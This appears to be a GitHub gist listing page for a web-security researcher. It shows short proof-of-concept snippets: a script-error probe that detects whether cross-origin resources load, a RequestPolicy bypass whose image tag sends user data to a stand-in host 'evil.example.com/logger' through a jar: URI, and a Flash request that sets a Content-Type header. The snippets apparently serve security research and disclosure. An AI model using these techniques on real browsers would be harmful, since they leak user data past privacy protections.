Jordan Milne JordanMilne

  • Canada
JordanMilne / cookie_jar_tests.json
Created Sep 14, 2015
Comparing the cookie parsing behaviours of various HTTP services
View cookie_jar_tests.json
JordanMilne / gist:6459317
Created Sep 6, 2013
Demonstrates abuse of script error handling
View gist:6459317
<html>
<body>
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
<script src="http://doesntexist.example.com" onload="javascript:alert('universe exploded')" onerror="javascript:alert('doesntexist failed to load as expected')"></script>
</body>
</html>
JordanMilne / gist:7704136
Created Nov 29, 2013
Demonstration of a RequestPolicy bypass using jar: URIs
View gist:7704136
<img src="jar:http://evil.example.com/logger?userdata=whatever!/foobar" />
View gist:8032399
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
JordanMilne / content-type.mxml
Created Jan 16, 2014
Setting the Content-Type header with Flash
View content-type.mxml
<?xml version="1.0"?>
<s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:mx="library://ns.adobe.com/flex/mx" xmlns:s="library://ns.adobe.com/flex/spark" >
<fx:Script><![CDATA[
import flash.net.*;
public function sendStuff():void
{
var r:URLRequest = new URLRequest('http://www.youtube.com/foo');
r.method = 'POST';
r.data = '{wow what a great post body}';
View testing
aesKeyStringFOOBARBAZQUUXquuxy
aaaa